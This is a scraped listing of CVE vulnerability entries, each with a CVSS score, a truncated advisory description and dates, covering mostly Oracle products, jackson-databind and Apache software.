Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Components Services). Supported versions that are affected are 8.0.22 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2028 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to c
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2021 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple pro
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2016 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.19 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple pro
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2031 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple pro
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2019 4.0
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 8.0.19 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via m
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2036 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple pro
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2020 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple prot
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2014 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PAM Auth Plugin). Supported versions that are affected are 5.7.32 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multip
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2024 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple prot
04-01-2022 - 17:27 20-01-2021 - 15:15
CVE-2021-2088 4.9
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where MyS
04-01-2022 - 17:09 20-01-2021 - 15:15
CVE-2021-2122 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols
04-01-2022 - 17:09 20-01-2021 - 15:15
CVE-2021-2065 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple pro
04-01-2022 - 17:08 20-01-2021 - 15:15
CVE-2021-2061 6.3
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 8.0.22 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protoco
04-01-2022 - 17:08 20-01-2021 - 15:15
CVE-2021-2087 4.9
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where MyS
04-01-2022 - 17:08 20-01-2021 - 15:15
CVE-2021-2076 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple pro
04-01-2022 - 17:08 20-01-2021 - 15:15
CVE-2021-2060 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.50 and prior, 5.7.32 and prior and 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attack
04-01-2022 - 17:08 20-01-2021 - 15:15
CVE-2021-2081 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Stored Procedure). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multi
04-01-2022 - 17:08 20-01-2021 - 15:15
CVE-2021-2072 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Stored Procedure). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multi
04-01-2022 - 17:08 20-01-2021 - 15:15
CVE-2021-2070 6.8
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple pro
04-01-2022 - 17:08 20-01-2021 - 15:15
CVE-2020-11998 7.5
A regression has been introduced in the commit preventing JMX re-bind. By passing an empty environment map to RMIConnectorServer, instead of the map that contains the authentication credentials, it leaves ActiveMQ open to the following attack: https:
10-12-2021 - 18:11 10-09-2020 - 19:15
CVE-2020-1967 5.0
Server or client applications that call the SSL_check_chain() function during or after a TLS 1.3 handshake may crash due to a NULL pointer dereference as a result of incorrect handling of the "signature_algorithms_cert" TLS extension. The crash occur
10-12-2021 - 17:11 21-04-2020 - 14:15
CVE-2020-11113 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.openjpa.ee.WASRegistryManagedRuntime (aka openjpa).
10-12-2021 - 17:11 31-03-2020 - 05:15
CVE-2020-11111 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.activemq.* (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).
10-12-2021 - 17:10 31-03-2020 - 05:15
CVE-2020-11112 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.proxy.provider.remoting.RmiProvider (aka apache/commons-proxy).
10-12-2021 - 17:10 31-03-2020 - 05:15
CVE-2020-10672 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms).
07-12-2021 - 19:44 18-03-2020 - 22:15
CVE-2020-10969 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to javax.swing.JEditorPane.
07-12-2021 - 19:43 26-03-2020 - 13:15
CVE-2020-10968 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.aoju.bus.proxy.provider.remoting.RmiProvider (aka bus-proxy).
07-12-2021 - 19:43 26-03-2020 - 13:15
CVE-2019-7164 7.5
SQLAlchemy through 1.2.17 and 1.3.x through 1.3.0b2 allows SQL Injection via the order_by parameter.
03-12-2021 - 20:09 20-02-2019 - 00:29
CVE-2020-9546 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig (aka shaded hikari-config).
02-12-2021 - 21:22 02-03-2020 - 04:15
CVE-2019-7548 6.8
SQLAlchemy 1.2.17 has SQL Injection when the group_by parameter can be controlled.
30-11-2021 - 19:52 06-02-2019 - 21:29
CVE-2020-14062 6.8
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool (aka xalan2).
17-11-2021 - 20:21 14-06-2020 - 20:15
CVE-2020-14195 6.8
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to org.jsecurity.realm.jndi.JndiRealmFactory (aka org.jsecurity).
17-11-2021 - 20:20 16-06-2020 - 16:15
CVE-2020-14060 6.8
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.xalan.lib.sql.JNDIConnectionPool (aka apache/drill).
17-11-2021 - 20:20 14-06-2020 - 21:15
CVE-2020-14061 6.8
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oracle.jms.AQjmsQueueConnectionFactory, oracle.jms.AQjmsXATopicConnectionFactory, oracle.jms.AQjmsTopicConnectionFactory, o
17-11-2021 - 16:56 14-06-2020 - 20:15
CVE-2020-10724 2.1
A vulnerability was found in DPDK versions 18.11 and above. The vhost-crypto library code is missing validations for user-supplied values, potentially allowing an information leak through an out-of-bounds memory read.
19-10-2021 - 14:17 19-05-2020 - 19:15
CVE-2020-14147 4.0
An integer overflow in the getnum function in lua_struct.c in Redis before 6.0.3 allows context-dependent attackers with permission to run Lua code in a Redis session to cause a denial of service (memory corruption and application crash) or possibly
30-07-2021 - 13:59 15-06-2020 - 18:15
CVE-2020-11996 5.0
A specially crafted sequence of HTTP/2 requests sent to Apache Tomcat 10.0.0-M1 to 10.0.0-M5, 9.0.0.M1 to 9.0.35 and 8.5.0 to 8.5.55 could trigger high CPU usage for several seconds. If a sufficient number of such requests were made on concurrent HTT
21-07-2021 - 11:39 26-06-2020 - 17:15
CVE-2020-5407 6.5
Spring Security versions 5.2.x prior to 5.2.4 and 5.3.x prior to 5.3.2 contain a signature wrapping vulnerability during SAML response validation. When using the spring-security-saml2-service-provider component, a malicious user can carefully modify
14-06-2021 - 18:15 13-05-2020 - 17:15
CVE-2020-5408 4.0
Spring Security versions 5.3.x prior to 5.3.2, 5.2.x prior to 5.2.4, 5.1.x prior to 5.1.10, 5.0.x prior to 5.0.16 and 4.2.x prior to 4.2.16 use a fixed null initialization vector with CBC Mode in the implementation of the queryable text encryptor. A
14-06-2021 - 18:15 14-05-2020 - 18:15
CVE-2016-5725 4.3
Directory traversal vulnerability in JCraft JSch before 0.1.54 on Windows, when the mode is ChannelSftp.OVERWRITE, allows remote SFTP servers to write to arbitrary files via a ..\ (dot dot backslash) in a response to a recursive GET command.
14-06-2021 - 18:15 19-01-2017 - 22:59
CVE-2017-12626 5.0
Apache POI in versions prior to release 3.17 are vulnerable to Denial of Service Attacks: 1) Infinite Loops while parsing crafted WMF, EMF, MSG and macros (POI bugs 61338 and 61294), and 2) Out of Memory Exceptions while parsing crafted DOC, PPT and
14-06-2021 - 18:15 29-01-2018 - 17:29
CVE-2019-10246 5.0
In Eclipse Jetty version 9.2.27, 9.3.26, and 9.4.16, the server running on Windows is vulnerable to exposure of the fully qualified Base Resource directory name on Windows to a remote client when it is configured for showing a Listing of directory co
14-06-2021 - 18:15 22-04-2019 - 20:29
CVE-2020-11984 7.5
Apache HTTP server 2.4.32 to 2.4.44 mod_proxy_uwsgi info disclosure and possible RCE
06-06-2021 - 11:15 07-08-2020 - 16:15
CVE-2020-11993 4.3
Apache HTTP Server versions 2.4.20 to 2.4.43 When trace/debug was enabled for the HTTP/2 module and on certain traffic edge patterns, logging statements were made on the wrong connection, causing concurrent use of memory pools. Configuring the LogLev
06-06-2021 - 11:15 07-08-2020 - 16:15
CVE-2020-11985 4.3
IP address spoofing when proxying using mod_remoteip and mod_rewrite For configurations using proxying with mod_remoteip and certain mod_rewrite rules, an attacker could spoof their IP address for logging and PHP scripts. Note this issue was fixed in
06-06-2021 - 11:15 07-08-2020 - 16:15
CVE-2020-1935 5.8
In Apache Tomcat 9.0.0.M1 to 9.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99 the HTTP header parsing code used an approach to end-of-line parsing that allowed some invalid HTTP headers to be parsed as valid. This led to a possibility of HTTP Request Smug
04-05-2021 - 19:19 24-02-2020 - 22:15
CVE-2021-2047 7.5
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core Components). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated att
18-03-2021 - 16:32 20-01-2021 - 15:15
CVE-2018-20781 2.1
In pam/gkr-pam-module.c in GNOME Keyring before 3.27.2, the user's password is kept in a session-child process spawned from the LightDM daemon. This can expose the credential in cleartext.
16-03-2021 - 14:02 12-02-2019 - 17:29
CVE-2020-11972 7.5
Apache Camel RabbitMQ enables Java deserialization by default. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.0, 3.0.0 up to 3.1.0 are affected. 2.x users should upgrade to 2.25.1, 3.x users should upgrade to 3.2.0.
15-03-2021 - 22:15 14-05-2020 - 17:15
CVE-2019-0188 5.0
Apache Camel prior to 2.24.0 contains an XML external entity injection (XXE) vulnerability (CWE-611) due to using an outdated vulnerable JSON-lib library. This affects only the camel-xmljson component, which was removed.
15-03-2021 - 18:25 28-05-2019 - 19:29
CVE-2018-11775 5.8
TLS hostname verification when using the Apache ActiveMQ Client before 5.15.6 was missing which could make the client vulnerable to a MITM attack between a Java application using the ActiveMQ client and the ActiveMQ server. This is now enabled by def
05-03-2021 - 19:15 10-09-2018 - 20:29
CVE-2020-14803 5.0
Vulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 11.0.8 and 15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocol
24-02-2021 - 21:42 21-10-2020 - 15:15
CVE-2020-11620 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded (aka commons-jelly).
22-02-2021 - 21:33 07-04-2020 - 23:15
CVE-2020-11619 6.8
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.springframework.aop.config.MethodLocatingFactoryBean (aka spring-aop).
22-02-2021 - 21:29 07-04-2020 - 23:15
CVE-2020-26575 5.0
In Wireshark through 3.2.7, the Facebook Zero Protocol (aka FBZERO) dissector could enter an infinite loop. This was addressed in epan/dissectors/packet-fbzero.c by correcting the implementation of offset advancement.
11-02-2021 - 14:48 06-10-2020 - 15:15
CVE-2020-25863 5.0
In Wireshark 3.2.0 to 3.2.6, 3.0.0 to 3.0.13, and 2.6.0 to 2.6.20, the MIME Multipart dissector could crash. This was addressed in epan/dissectors/packet-multipart.c by correcting the deallocation of invalid MIME parts.
10-02-2021 - 20:22 06-10-2020 - 15:15
CVE-2020-25862 5.0
In Wireshark 3.2.0 to 3.2.6, 3.0.0 to 3.0.13, and 2.6.0 to 2.6.20, the TCP dissector could crash. This was addressed in epan/dissectors/packet-tcp.c by changing the handling of the invalid 0xFFFF checksum.
10-02-2021 - 20:20 06-10-2020 - 15:15
CVE-2017-5611 7.5
SQL injection vulnerability in wp-includes/class-wp-query.php in WP_Query in WordPress before 4.7.2 allows remote attackers to execute arbitrary SQL commands by leveraging the presence of an affected plugin or theme that mishandles a crafted post typ
30-01-2021 - 02:37 30-01-2017 - 04:59
CVE-2018-2587 5.8
Vulnerability in the Oracle Access Manager component of Oracle Fusion Middleware (subcomponent: Web Server Plugin). Supported versions that are affected are 10.1.4.3.0, 11.1.2.3.0 and 12.2.1.3.0. Difficult to exploit vulnerability allows unauthentica
30-01-2021 - 02:37 19-04-2018 - 02:29
CVE-2018-7318 7.5
SQL Injection exists in the CheckList 1.1.1 component for Joomla! via the title_search, tag_search, name_search, description_search, or filter_order parameter.
30-01-2021 - 02:37 22-02-2018 - 19:29
CVE-2019-3778 6.4
Spring Security OAuth, versions 2.3 prior to 2.3.5, and 2.2 prior to 2.2.4, and 2.1 prior to 2.1.4, and 2.0 prior to 2.0.17, and older unsupported versions could be susceptible to an open redirector attack that can leak an authorization code. A malic
30-01-2021 - 02:36 07-03-2019 - 18:29
CVE-2018-9019 7.5
SQL Injection vulnerability in Dolibarr before version 7.0.2 allows remote attackers to execute arbitrary SQL commands via the sortfield parameter to /accountancy/admin/accountmodel.php, /accountancy/admin/categories_list.php, /accountancy/admin/jour
30-01-2021 - 02:36 22-05-2018 - 20:29
CVE-2019-11269 5.8
Spring Security OAuth versions 2.3 prior to 2.3.6, 2.2 prior to 2.2.5, 2.1 prior to 2.1.5, and 2.0 prior to 2.0.18, as well as older unsupported versions could be susceptible to an open redirector attack that can leak an authorization code. A malicio
30-01-2021 - 02:36 12-06-2019 - 15:29
CVE-2021-2125 3.6
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
28-01-2021 - 18:37 20-01-2021 - 15:15
CVE-2021-2131 2.1
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 22:37 20-01-2021 - 15:15
CVE-2021-2130 4.9
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 22:36 20-01-2021 - 15:15
CVE-2021-2129 3.6
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 22:36 20-01-2021 - 15:15
CVE-2021-2128 2.1
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure
27-01-2021 - 22:36 20-01-2021 - 15:15
CVE-2021-2126 2.1
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 22:35 20-01-2021 - 15:15
CVE-2021-2109 6.5
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high
27-01-2021 - 22:33 20-01-2021 - 15:15
CVE-2021-2111 2.1
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 22:33 20-01-2021 - 15:15
CVE-2021-2086 4.9
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 22:33 20-01-2021 - 15:15
CVE-2021-2112 2.1
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 22:32 20-01-2021 - 15:15
CVE-2021-2121 4.9
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 22:30 20-01-2021 - 15:15
CVE-2021-2120 2.1
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 22:30 20-01-2021 - 15:15
CVE-2021-2074 4.6
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 01:40 20-01-2021 - 15:15
CVE-2021-2073 4.9
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 01:34 20-01-2021 - 15:15
CVE-2021-2127 4.9
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 01:32 20-01-2021 - 15:15
CVE-2021-2124 4.9
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
27-01-2021 - 01:19 20-01-2021 - 15:15
CVE-2021-2057 6.5
Vulnerability in the Oracle Retail Customer Management and Segmentation Foundation product of Oracle Retail Applications (component: Internal Operations). The supported version that is affected is 19.0. Easily exploitable vulnerability allows low pri
26-01-2021 - 20:04 20-01-2021 - 15:15
CVE-2021-2062 4.9
Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Web Server). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged at
26-01-2021 - 19:55 20-01-2021 - 15:15
CVE-2021-2059 5.0
Vulnerability in the Oracle iStore product of Oracle E-Business Suite (component: Web interface). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network
26-01-2021 - 19:36 20-01-2021 - 15:15
CVE-2021-2054 6.5
Vulnerability in the RDBMS Sharding component of Oracle Database Server. Supported versions that are affected are 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having Create Any Procedure, Create Any View, Cr
26-01-2021 - 19:28 20-01-2021 - 15:15
CVE-2021-2052 5.0
Vulnerability in the JD Edwards EnterpriseOne Orchestrator product of Oracle JD Edwards (component: E1 IOT Orchestrator Security). The supported version that is affected is Prior to 9.2.5.1. Easily exploitable vulnerability allows unauthenticated att
26-01-2021 - 18:41 20-01-2021 - 15:15
CVE-2021-2123 2.1
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure
26-01-2021 - 18:21 20-01-2021 - 15:15
CVE-2021-2118 5.8
Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacke
26-01-2021 - 18:06 20-01-2021 - 15:15
CVE-2021-2117 4.9
Vulnerability in the Oracle Application Express Survey Builder component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having Valid User Account pri
26-01-2021 - 17:29 20-01-2021 - 15:15
CVE-2021-2116 4.9
Vulnerability in the Oracle Application Express Opportunity Tracker component of Oracle Database Server. The supported version that is affected is Prior to 20.2. Easily exploitable vulnerability allows low privileged attacker having Valid User Accoun
26-01-2021 - 17:09 20-01-2021 - 15:15
CVE-2021-2115 4.9
Vulnerability in the Oracle Common Applications Calendar product of Oracle E-Business Suite (component: Tasks). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows low privileged attacker
26-01-2021 - 16:44 20-01-2021 - 15:15
CVE-2021-2050 6.5
Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: E-Business Suite - XDO). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low p
26-01-2021 - 16:29 20-01-2021 - 15:15
CVE-2021-2051 6.5
Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: E-Business Suite - XDO). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low p
26-01-2021 - 16:21 20-01-2021 - 15:15
CVE-2021-2114 5.8
Vulnerability in the Oracle Common Applications Calendar product of Oracle E-Business Suite (component: Applications Calendar). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthe
26-01-2021 - 16:14 20-01-2021 - 15:15
CVE-2021-2113 4.0
Vulnerability in the Oracle Financial Services Revenue Management and Billing product of Oracle Financial Services Applications (component: On Demand Billing). Supported versions that are affected are 2.9.0.0 and 2.9.0.1. Easily exploitable vulnerabi
26-01-2021 - 16:00 20-01-2021 - 15:15
CVE-2021-2110 4.0
Vulnerability in the Oracle Argus Safety product of Oracle Health Sciences Applications (component: Letters). The supported version that is affected is 8.2.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTT
26-01-2021 - 15:53 20-01-2021 - 15:15
CVE-2021-2049 6.5
Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Administration). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privilege
26-01-2021 - 15:21 20-01-2021 - 15:15
CVE-2021-2099 5.8
Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Preferences). Supported versions that are affected are 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network a
26-01-2021 - 15:17 20-01-2021 - 15:15
CVE-2021-2102 5.8
Vulnerability in the Oracle Complex Maintenance, Repair, and Overhaul product of Oracle Supply Chain (component: Dialog Box). Supported versions that are affected are 11.5.10, 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated att
26-01-2021 - 15:17 20-01-2021 - 15:15
CVE-2021-2108 7.5
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core Components). The supported version that is affected is 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access v
26-01-2021 - 15:11 20-01-2021 - 15:15
CVE-2021-2107 5.8
Vulnerability in the Oracle Customer Interaction History product of Oracle E-Business Suite (component: Outcome-Result). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticate
26-01-2021 - 15:07 20-01-2021 - 15:15
CVE-2021-2106 5.8
Vulnerability in the Oracle Customer Interaction History product of Oracle E-Business Suite (component: Outcome-Result). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticate
26-01-2021 - 14:45 20-01-2021 - 15:15
CVE-2021-2105 5.8
Vulnerability in the Oracle Customer Interaction History product of Oracle E-Business Suite (component: Outcome-Result). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticate
26-01-2021 - 14:45 20-01-2021 - 15:15
CVE-2021-2103 5.8
Vulnerability in the Oracle Complex Maintenance, Repair, and Overhaul product of Oracle Supply Chain (component: Dialog Box). Supported versions that are affected are 11.5.10, 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated att
26-01-2021 - 14:45 20-01-2021 - 15:15
CVE-2021-2104 5.8
Vulnerability in the Oracle Complex Maintenance, Repair, and Overhaul product of Oracle Supply Chain (component: Dialog Box). Supported versions that are affected are 11.5.10, 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated att
26-01-2021 - 14:45 20-01-2021 - 15:15
CVE-2021-2034 5.8
Vulnerability in the Oracle Common Applications Calendar product of Oracle E-Business Suite (component: Tasks). Supported versions that are affected are 12.1.1-12.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network acce
25-01-2021 - 21:50 20-01-2021 - 15:15
CVE-2021-2035 6.5
Vulnerability in the RDBMS Scheduler component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows low privileged attacker having Export Full Database privilege
25-01-2021 - 21:47 20-01-2021 - 15:15
CVE-2021-2039 4.9
Vulnerability in the Siebel Core - Server Framework product of Oracle Siebel CRM (component: Search). Supported versions that are affected are 20.12 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via HT
25-01-2021 - 21:45 20-01-2021 - 15:15
CVE-2021-2040 5.8
Vulnerability in the Oracle Argus Safety product of Oracle Health Sciences Applications (component: Case Form, Local Affiliate Form). The supported version that is affected is 8.2.2. Easily exploitable vulnerability allows unauthenticated attacker wi
25-01-2021 - 21:39 20-01-2021 - 15:15
CVE-2021-2041 6.8
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Installation). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Difficult to exploit vulnerability allows unauthen
25-01-2021 - 21:30 20-01-2021 - 15:15
CVE-2021-2043 5.8
Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Portal). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network acces
25-01-2021 - 21:11 20-01-2021 - 15:15
CVE-2021-2044 4.0
Vulnerability in the PeopleSoft Enterprise FIN Payables product of Oracle PeopleSoft (component: Financial Sanctions). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access
25-01-2021 - 21:08 20-01-2021 - 15:15
CVE-2021-2094 5.8
Vulnerability in the Oracle One-to-One Fulfillment product of Oracle E-Business Suite (component: Print Server). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attack
25-01-2021 - 21:06 20-01-2021 - 15:15
CVE-2021-2100 6.4
Vulnerability in the Oracle One-to-One Fulfillment product of Oracle E-Business Suite (component: Print Server). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attack
25-01-2021 - 21:03 20-01-2021 - 15:15
CVE-2021-2101 6.4
